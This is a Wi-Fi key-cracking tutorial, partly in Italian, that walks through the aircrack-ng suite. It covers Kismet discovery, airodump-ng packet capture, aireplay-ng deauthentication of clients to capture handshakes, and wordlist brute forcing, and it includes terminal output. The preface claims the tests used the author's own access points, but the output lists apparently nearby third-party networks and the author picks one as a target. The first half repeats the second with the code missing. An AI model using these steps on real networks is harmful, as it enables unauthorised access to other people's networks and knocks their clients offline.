------------------| Prefazione |-----------------------
La seguente guida e' in continuo aggiornamento per via dei vari test e le varie casistiche di errori nel crackare una wep/wpa.
Il tutorial sempre aggiornato lo trovate qui
Ricordo che i test sono stati effettuati su AP creati ad hoc per questi test e che e' illegale riprodurlo su AP altrui.
Author: Langy ( www.googlebig.com )
----------------------------------------------------------
What is aircrack:
www.aircrack-ng.org
Download / Install aircrack-ng (deb):
or
For more information go here.
Aircrack-ng suite include this tools:
In this example of WEP crack we will use:
1) Kismet (Wireless network detector)
2) airodump-ng (Sniffing packages)
3) aireplay-ng (is used to inject frames)
4) aircrack-ng (Brute force on pagackes sniffed)
------------------------------------------------------------------------------
[size=x-large]1) Kismet (Wireless network detector)[/size]
Download / Install Kismet (deb):
www.kismetwireless.net
Start kismet
With Kismet we can see all available wireless connection with all informations that we need. (client connected, channel and SSID etc.)
[size=x-large]2) airodump-ng (Sniffing packages)[/size]
airodump-ng --channel <channel> -b <bssid> <interface> --write <file>
Example:
This sniff will save testing_snif-01.cap in our home folder.
[size=x-large]3) aireplay-ng (is used to inject frames)[/size]
aireplay-ng -0 1 -a <bssid> -c <client_mac_address> <interface>
With this command we can take handshakes packages.
aireplay-ng is used simultaneously with airodump-ng!
[size=x-large]4) aircrack (Brute force on pagackes sniffed)[/size]
aircrack-ng -w <wordlist> -b <bssid> <file.cap>
You can find a good wordlist on St4ck website
Download: wordlist.zip
Example of handshakes failed:
Example of insufficient IVs:
La seguente guida e' in continuo aggiornamento per via dei vari test e le varie casistiche di errori nel crackare una wep/wpa.
Il tutorial sempre aggiornato lo trovate qui
Ricordo che i test sono stati effettuati su AP creati ad hoc per questi test e che e' illegale riprodurlo su AP altrui.
Author: Langy ( www.googlebig.com )
----------------------------------------------------------
What is aircrack:
Codice:
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.
Download / Install aircrack-ng (deb):
Codice:
langy@googlebig:~$ sudo apt-get install aircrack-ng
Codice:
wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc1.tar.gz
tar -zxvf aircrack-ng-1.0-rc1.tar.gz
cd aircrack-ng-1.0-rc1
make
make install
Aircrack-ng suite include this tools:
Codice:
aircrack-ng airdriver-ng airmon-ng airolib-ng airtun-ng
airdecap-ng aireplay-ng airodump-ng airserv-ng
In this example of WEP crack we will use:
1) Kismet (Wireless network detector)
2) airodump-ng (Sniffing packages)
3) aireplay-ng (is used to inject frames)
4) aircrack-ng (Brute force on pagackes sniffed)
------------------------------------------------------------------------------
[size=x-large]1) Kismet (Wireless network detector)[/size]
Download / Install Kismet (deb):
Codice:
langy@googlebig:~$ sudo apt-get install kismet
Start kismet
Codice:
langy@googlebig:~$ sudo kismet
With Kismet we can see all available wireless connection with all informations that we need. (client connected, channel and SSID etc.)
[size=x-large]2) airodump-ng (Sniffing packages)[/size]
airodump-ng --channel <channel> -b <bssid> <interface> --write <file>
Example:
Codice:
langy@googlebig:~$ sudo airodump-ng --channel 11 wlan0 --write testsnif
CH 11 ][ Elapsed: 8 mins ][ 2008-10-06 22:28
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES
XX:69:31:1E 0 0 0 0 0 11 48 WEP WEP A
XX:62:33:30 0 90 4933 18187 32 11 54. WPA TKIP PSK N
XX:40:6F:BC -1 0 0 646 0 11 -1 OPN <
BSSID STATION PWR Rate Lost Packets Probes
XX:62:33:30 XX:8F:DA:FA -1 36- 0 0 17845
(not associated) XX:32:52:40 0 0- 1 0 97 default,DLINK
(not associated) XX:12:78:50 0 0- 1 0 49
(not associated) XX:9D:CA:32 0 0- 1 0 36 HotSpot Resid
(not associated) XX:A2:2C:CC 0 0- 1 0 12
(not associated) XX:4B:B0:FC 0 0- 1 0 56 HotSpot Resid
(not associated) XX:02:ED:70 0 0- 1 0 15 HotSpot Resid
(not associated) XX:2C:DB:D3 0 0- 1 0 5 3Com
XX:40:6F:BC XX:8E:F4:78 0 0- 1 0 761 foti
This sniff will save testing_snif-01.cap in our home folder.
[size=x-large]3) aireplay-ng (is used to inject frames)[/size]
aireplay-ng -0 1 -a <bssid> -c <client_mac_address> <interface>
With this command we can take handshakes packages.
aireplay-ng is used simultaneously with airodump-ng!
[size=x-large]4) aircrack (Brute force on pagackes sniffed)[/size]
aircrack-ng -w <wordlist> -b <bssid> <file.cap>
You can find a good wordlist on St4ck website
Download: wordlist.zip
Example of handshakes failed:
Codice:
langy@googlebig:~$ aircrack-ng -w /media/dati/H4ck1n9/all.txt /home/langy/*.cap
Opening /home/langy/testsnif-01.cap
Read 45077 packets.
# BSSID ESSID Encryption
1 XX:62:33:30 NETGEAR WPA (0 handshake)
2 XX:40:6F:BC None (192.168.2.5)
3 XX:F0:85:58 dado No data - WEP or WPA
4 XX:69:31:1E Alice-382XXXX No data - WEP or WPA
Index number of target network ? 1
Opening /home/langy/testsnif-01.cap
No valid WPA handshakes found..
Quitting aircrack-ng...
langy@googlebig:~$
Example of insufficient IVs:
Codice:
langy@googlebig:~$ aircrack-ng -w /media/dati/H4ck1n9/all.txt /home/langy/*.cap
Opening /home/langy/test2snif-01.cap
Opening /home/langy/test3snif-01.cap
Opening /home/langy/test4snif-01.cap
Opening /home/langy/testing_snif-01.cap
Opening /home/langy/testsnif-01.cap
Read 192412 packets.
# BSSID ESSID Encryption
1 XX:62:33:30 NETGEAR WPA (0 handshake)
2 XX:00:3C:A5 HotSpot Residence None (0.0.0.0)
3 XX:69:31:1E Alice-382XXXX No data - WEP or WPA
4 XX:56:66:F0 TESTING CENTER WEP (7340 IVs)
5 XX:D4:46:60 No data - WEP or WPA
6 XX:6D:92:D0 Unknown
7 XX:40:6F:BC None (192.168.2.5)
8 XX:F0:85:58 dado No data - WEP or WPA
Index number of target network ? 4
Opening /home/langy/test2snif-01.cap
Opening /home/langy/test3snif-01.cap
Opening /home/langy/test4snif-01.cap
Opening /home/langy/testing_snif-01.cap
Opening /home/langy/testsnif-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 2677 ivs.
Aircrack-ng 1.0 beta1
[00:00:58] Tested 167049 keys (got 2677 IVs)
KB depth byte(vote)
0 55/ 56 FC(3328) 02(3072) 0F(3072) 12(3072) 13(3072)
1 9/ 15 03(4352) 23(4096) 2A(4096) 5D(4096) 88(4096)
2 1/ 2 5F(5120) AE(4352) C4(4352) 05(4096) 0E(4096)
3 12/ 3 ED(4096) 05(3840) 27(3840) 2A(3840) 32(3840)
4 17/ 4 C1(4352) 73(4096) FC(4096) 29(3840) 50(3840)
Failed. Next try with 5000 IVs.
Quitting aircrack-ng...